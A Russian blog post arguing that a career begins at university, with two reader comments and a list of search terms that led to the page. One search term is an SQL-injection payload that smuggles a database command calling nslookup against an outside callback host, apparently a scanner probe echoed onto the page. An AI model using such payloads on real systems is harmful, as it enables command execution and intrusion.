Последние новости
Карьера /

Карьера начинается с ВУЗа

Отучившись в ВУЗе любой студент мечтает получить хорошую работу. Однако зачастую студенты при выходе из ВУЗа имеют лишь теоретические знания и маленький опыт, либо вообще опыт в профессиональной сфере отсутствует.

Сейчас, когда кризис продолжается шанс найти престижную работу имеют только самые умные выпускники. Причем работодатель обращает внимание на то где стажировался студент, его практические навыки.

Некоторые ВУЗы стараются сотрудничать с работодателями и оказывают помощь в дальнейшем трудоустройстве своих студентов. Это очень хорошая практика, особенно для студентов. Поэтому при выборе ВУЗа неплохо было бы поинтересоваться, а не сотрудничает ли ваше учебное заведение с фирмами и организациями. Однако чтобы иметь возможность трудоустроиться в такую организацию нужно хорошо постараться, и даже чем то отличаться от других студентов. Потому что никакая организация не способна трудоустроить всех студентов.
Так что зарекомендовать себя с положительной стороны нужно стараться еще в процессе обучения, чтобы добиться больших успехов в карьерном росте.

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-2198.1964.d4a4e.1.bxss.me
  • testing
  • карьера начинается со школьной скамьи
2 комментария
irasolnishko / 9 июля 2012 / 17:22
Согласна, карьера начинается с ВУЗа, но фундамент закладывается еще в школе.Имея нормальные знания, студенту главное обеспечить себе хорошую репутацию на первом курсе. Один профессор во время моей учебы сказал: "Первый год ты работаешь на репутацию, потом - она на тебя". Но вся беда в том, что сегодня работодатель обращает внимание не только на место стажировки, но и на престижность ВУЗа. Это делает накопленные студентом знания и навыки менее важными.
Anzariya / 20 июля 2012 / 00:55
Карьера начинается с ВУЗа?.. Вполне возможно, для кого-то так и есть. Ну тогда правомерно сказать, что в наше время карьера начинается уже со школьной скамьи. Ведь, избирая для себя будущую профессию, современные школьники не в последнюю очередь думают о карьерных возможностях будущей специальности. Но... Я не совсем согласна с утверждением, что, обучаясь в ВУЗе, необходимо разработать тактику и стратегию завоевания авторитета ( который и будет работать на тебя). Разве только студенту именно это занятие доставляет особое удовольствие? Тогда - почему нет...А если ты чётко понимаешь, что дело, которому обучаешься, тебе близко, то ты явно приложишь максимум стараний, чтобы как можно больше выжать из "пятилетки" для себя ( что естественным образом отразится на будущих карьерных успехах).
имя


Популярые сообщения